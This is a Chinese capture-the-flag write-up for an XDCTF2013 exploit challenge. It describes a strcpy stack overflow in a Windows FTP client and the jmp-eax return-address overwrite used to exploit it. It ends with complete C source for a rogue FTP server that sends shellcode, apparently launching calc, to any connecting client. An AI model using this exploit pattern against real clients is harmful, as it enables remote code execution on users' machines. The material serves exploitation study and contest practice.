XDCTF2013线上赛exploit关（三）

国际惯例，下载程序后先拖入IDA分析，看了半天也没看出个所以然。

于是直接发送超长数据，看程序会不会崩。

FTP服务器在接收完USER和PASS之后，会发送Welcome信息。直觉告诉我，这儿应该会崩，于是写个socket程序，发送长字符串，程序果然崩了。

然后用windbg载入，用kn命令看一下调用堆栈。尝试了几次后，找到了关键函数sub_4013D0。

这个函数先是创建socket，然后连接远程FTP服务器，之后会调用recv()函数。而且在每次调用recv()之后，都会将接收数据的buf作为参数，调用sub_401032。这个函数就是被覆盖返回地址的函数了。

进入sub_401032后，程序申请了一个0x12C字节的空间

Dest            = byte ptr -12Ch

然后将其作为Dest，将前面传入的buf作为Source，调用strcpy()函数。

.text:0040126E                 mov     eax, [ebp+Source]
.text:00401271                 push    eax             ; Source
.text:00401272                 lea     ecx, [ebp+Dest]
.text:00401278                 push    ecx             ; Dest
.text:00401279                 call    _strcpy

由于strcpy()不检查缓冲区边界，造成溢出。

找到溢出点之后，接下来就要构造缓冲区，进行利用了。

strcpy函数返回后，eax作为返回值存放的是Dest的地址，因此可以用它还做跳板。

                          ---------------------
shellcode        共计0x12C字节
junk
                          ---------------------
ebp
RetAddr        <-- 填充为7c8f6571，即jmp eax

由于每次调用recv()接收数据之后，都会调用sub_401032，因此可以在接受连接发送banner的时候，直接发送shellcode过去。

#include <stdio.h>#include <stdlib.h>#include <WinSock.h>#include <string.h>#pragma comment(lib, "ws2_32.lib")#define PORT 21#define BACKLOG 10#define LEN 308char buf[] = "\xFC\x68\xC9\xBC\xA6\x6B\x68\x63\x89\xD1\x4F\x8B""\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x33\xD2""\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09""\x8B\x51\x18\x8B\x52\x34\x80\xFA\x33\x74\x02\x8B""\x09\x8B\x69\x08\xAD\x60\x8B\x45\x3C\x8B\x4C\x05""\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B""\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08""\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C""\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B""\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61""\x3D\xC9\xBC\xA6\x6B\x75\xB5\x33\xDB\x33\xC0\x53""\x40\x3C\x20\x75\xFA\x33\xDB\x53\xBB\x63\x61\x6C""\x63\x53\x8B\xCC\x33\xC0\x54\x54\x50\x50\x50\x54""\x50\x50\x51\x50\xFF\x57\xFC\x33\xDB\x53\xFF\x57""\xF8";int InitSocket(){WORDwVersionRequested;WSADATAwsaData;interr;wVersionRequested = MAKEWORD(2, 2);err = WSAStartup(wVersionRequested, &wsaData);if (err != 0){printf("WSAStartup failed with error: %d\n", err);return 1;}if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2){printf("Could not find a usable version of Winsock.dll\n");WSACleanup();return 1;}return 0;}int main(){SOCKETsockServer;SOCKETsockClient;SOCKADDR_INServerAddr;SOCKADDR_IN ClientAddr;int sin_size;char shellcode[LEN];memset(shellcode, 0x90, LEN);strcpy(shellcode, buf);shellcode[strlen(buf)] = '\x90';*((int *)(shellcode+LEN-4)) = 0x7c8f6571;// jmp eaxServerAddr.sin_family = AF_INET;ServerAddr.sin_port = htons(PORT);ServerAddr.sin_addr.S_un.S_addr = INADDR_ANY;memset(&(ServerAddr.sin_zero), 0, sizeof(ServerAddr.sin_zero));InitSocket();if ((sockServer = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET){printf("[-] Create socket failed.\n");exit(1);}printf("[+] Create socket succeed.\n");if (bind(sockServer, (sockaddr *)&ServerAddr, sizeof(ServerAddr)) == -1){printf("[-] Bind port failed.\n");exit(1);}if (listen(sockServer, BACKLOG) == -1){printf("[-] listen failed.\n");exit(1);}printf("[+] Listening port %d...\n", PORT);sin_size = sizeof(SOCKADDR_IN);sockClient = accept(sockServer, (sockaddr *)&ClientAddr, &sin_size);if (sockClient == INVALID_SOCKET){printf("[-] accept failed.\n");exit(1);}printf("[+] Receive connect from %s.\n", inet_ntoa(ClientAddr.sin_addr));printf("[+] Sending shellcode...\n");if (send(sockClient, shellcode, LEN, 0) == -1){printf("[-] Send shellcode failed.\n");exit(0);}printf("[+] Done.\n");closesocket(sockClient);closesocket(sockServer);WSACleanup();return 0;}

利用程序很简单，监听21端口，收到连接就发送shellcode过去。